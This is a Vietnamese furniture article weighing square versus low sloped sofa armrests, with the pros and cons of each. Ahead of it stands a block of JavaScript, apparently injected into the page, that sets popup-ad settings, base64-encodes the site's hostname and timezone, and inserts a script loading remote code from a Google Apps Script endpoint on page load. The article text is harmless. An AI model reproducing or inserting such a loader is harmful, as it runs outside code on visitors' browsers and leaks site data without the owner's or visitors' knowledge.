var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Nên chọn sofa tay vịn vuông hay be thấp?

Tay vịn sofa là một trong những bộ phận quan trọng góp phần giúp sản phẩm hoàn thiện và đầy đủ các chức năng hơn. Bộ phận tay vịn của sofa cho phòng khách cũng có nhiều các kiểu dáng khác nhau, trong đó dáng vuông và dáng be thấp phổ biến hơn cả. Vậy trong hai kiểu dáng đó của sofa nên chọn loại nào?

Nên chọn sofa tay vịn vuông hay be thấp?

Với mỗi loại tay vịn của ghế sofa sẽ có các đặc điểm riêng. Chúng ta có thể tìm hiểu rõ hơn về hai loại tay vịn này để từ đó có được sự lựa chọn phù hợp nhất.

Sofa tay vịn vuông

Sofa tay vịn vuông được áp dụng cho nhiều các loại ghế sofa khác nhau. Tay vịn vuông thường sẽ được thiết kế cao nên cực kì tiện nghi khi bạn ngồi, có chỗ để tay thoải mái. Kiểu dáng vuông của sofa còn giúp sản phẩm thêm phần hiện đại, trẻ trung với các đường nét góc cạnh mạnh mẽ. Tuy nhiên với loại tay vịn này thì cảm giác ghế sofa sẽ ít thanh thoát hơn và lúc nằm thì bạn cũng không thể gối đầu lên được. Loại sofa này đa dạng mẫu mã như sofa góc phong cách hiện đại, sofa văng bộ, sofa văng chữ I nhỏ gọn…

nên chọn sofa tay vịn vuông hay be thấp
Tay vịn vuông của sofa cho bạn đặt tay thoải mái khi ngồi, tạo sự hiện đại, mạnh mẽ cho bộ sofa

nên chọn sofa tay vịn vuông hay be thấp
Những mẫu sofa tay vịn vuông sẽ khá khó khăn khi bạn nằm xuống và gối đầu


Sofa tay vịn be thấp

Hiện nay dòng sofa tay vịn be thấp được rất nhiều người yêu thích. Nó cũng được áp dụng cho nhiều loại sofa khác nhau, từ sofa văng đến sofa góc, sofa giường… Sofa tay vịn be thấp giúp bộ ghế sofa trở nên thanh thoát hơn, thuận tiện khi bạn nằm nghỉ ngơi. Tuy nhiên khi bạn ngồi muốn để tay thì sản phẩm này lại không đáp ứng được. Sofa tay vịn thấp được thấy phổ biến nhất ở sofa da và cũng có rất nhiều các mẫu mã khác nhau.

nên chọn sofa tay vịn vuông hay be thấp
Tay vịn sofa be thấp cho sofa thanh thoát, mềm mại, thoải mái khi nằm nghỉ ngơi

nên chọn sofa tay vịn vuông hay be thấp
Do tay vịn thấp nên khi ngồi bạn sẽ không có chỗ để đặt tay thoải mái

Nói chung mỗi kiểu dáng tay vịn của sofa sẽ có các ưu điểm riêng. Trên đây là đặc điểm của hai loại tay vịn vuông và be thấp, bạn có thể tham khảo và chọn sản phẩm thật thích hợp với nhu cầu của bạn cũng như tạo được vẻ đẹp trong không gian.